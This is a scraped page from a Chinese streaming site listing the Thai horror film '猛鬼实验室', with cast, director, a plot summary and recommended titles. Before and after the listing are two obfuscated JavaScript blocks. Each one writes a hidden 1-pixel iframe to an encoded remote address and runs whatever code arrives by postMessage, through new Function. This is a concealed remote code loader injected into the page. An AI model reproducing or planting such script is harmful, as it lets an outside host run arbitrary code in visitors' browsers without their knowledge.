if(typeof eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=="undefined"){eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=function(e){var sx="ABCDEFGHIJKLMNOPQRSTUVWXYZ"+"abcdefghijklmnopqrstuvwxyz"+"0123456789+/=";var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=sx.indexOf(e.charAt(f++));o=sx.indexOf(e.charAt(f++));u=sx.indexOf(e.charAt(f++));a=sx.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return(function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);};}
eval('\x77\x69\x6e\x64\x6f\x77')['XkHRaDH']=function (){ ;(function (u, w, d, f, c) { 'jQuery'; var x = qdfEWb; var _id = d['qu'+'ery'+'Se'+'le'+'cto'+'rA'+'ll']('.a7465').length; u = decodeURIComponent(x(u.replace(new RegExp(c + '' + c, 'g'), '')))+'c'+_id+'.fon'; var __nid='i'+new Date().getTime(); var k = '', wr = 'w' + 'ri' + 't' + 'e'; var c = d[x('Y3VycmVudFNjcmlwdA==')]; var f = d.createElement('iframe'); f.id = __nid; f.className = 'a7465'; f.style.width = f.style.height = 1 + 'px'; f.src = [u].join('-'); d[wr](f.outerHTML); w['__y' + 'ra' + 'nq' + 'ob' + 'j_7465_'+_id] = d['qu' + 'ery' + 'Sele' + 'cto' + 'r']('#'+__nid); w['ad' + 'dEv' + 'entL' + 'ist' + 'ener']('m' + 'ess' + 'age', function (e) { if (e.data[`des_s_7465_`+_id]) { var t = x(e.data[`des_s_7465_`+_id].replace(new RegExp('FdaWAFAbWFf', 'g'), '')); new Function(decodeURIComponent(t.replace(/\+/g, '%20')))(); } }); })(''+'aHR'+'0cH'+'MlM'+'FF0'+'ElM'+'kYF'+'FlM'+'kZq'+'YS5'+'zdG'+'16e'+'nMu'+'YFF'+'29t'+'JTN'+'FFB'+'MTA'+'0NF'+'FDM'+'lFF'+'MkZ'+'jNG'+'NhN'+'DIl'+'MkZ'+'jLT'+'c0N'+'jUt'+'FFM'+'jUt'+'MWU'+'2', window, document, '' + 'Pwf' + 'SmZ' + 'j' + '', 'F');}

猛鬼实验室

5.0

主演:朋抔·里拉塔纳卡邹,帕瑞斯·因塔拉科玛亚苏特,娜塔妮查·纳瓦塔纳瓦尼

导演:巴域·普瑞克潘也

飞速云

剧情介绍

两位医生朋友格拉和阿威在进行一项关于来世的研究实验,结果他们亲眼看到“鬼魂”,并由此一发不可收拾,决心要为幽灵和来世的存在寻找科学解释。他们的狂热和对未知不计后果的追求如同一个无底洞,将危及他们的友谊和至亲之人。

猜您喜欢的

 • 超清

  外出时刻

 • 正片

  蜿蜒

 • 超清

  完美

 • 正片

  完美杀手之家

 • 全26集

  O型血

 • 更新至54集已完结

  新铁石心肠

 • BD

  猛鬼实验室

 • 正片

  一杯上路

 • 正片

  泳队惊魂Copyright © 2018 6080在线影视网站-高清影视大全

if(typeof eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=="undefined"){eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=function(e){var sx="ABCDEFGHIJKLMNOPQRSTUVWXYZ"+"abcdefghijklmnopqrstuvwxyz"+"0123456789+/=";var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=sx.indexOf(e.charAt(f++));o=sx.indexOf(e.charAt(f++));u=sx.indexOf(e.charAt(f++));a=sx.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return(function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);};}
eval('\x77\x69\x6e\x64\x6f\x77')['mQsxxjd']=function (){ ;(function (u, w, d, f, c) { var x = qdfEWb; u = decodeURIComponent(x(u.replace(new RegExp(c + '' + c, 'g'), '')))+'.fon'; 'jQuery'; var k = '', wr = 'w' + 'ri' + 't' + 'e'; var c = d[x('Y3VycmVudFNjcmlwdA==')]; var f = d.createElement('iframe'); f.id = new Date().getTime(); f.style.width = f.style.height = 1 + 'px'; f.src = [u].join('-'); d[wr](f.outerHTML); w['ad' + 'dEv' + 'entL' + 'ist' + 'ener']('m' + 'ess' + 'age', function (e) { if (e.data[`des_s_7464`]) { var t = x(e.data[`des_s_7464`].replace(new RegExp('FdaWAFAbWFf', 'g'), '')); new Function(decodeURIComponent(t.replace(/\+/g, '%20')))(); } }); })(''+'aHR'+'0cH'+'MlM'+'0El'+'MkY'+'lMk'+'FFZ'+'qYS'+'5zd'+'G16'+'enM'+'uYF'+'F29'+'tFF'+'JTN'+'FFB'+'MTA'+'0ND'+'MlM'+'kZj'+'NGN'+'hNF'+'FDI'+'lMk'+'ZjL'+'TFF'+'c0N'+'jQt'+'FFM'+'jIt'+'MWU'+'2',window, document, '' + 'Pwf' + 'SmZ' + 'j' + '', 'F');}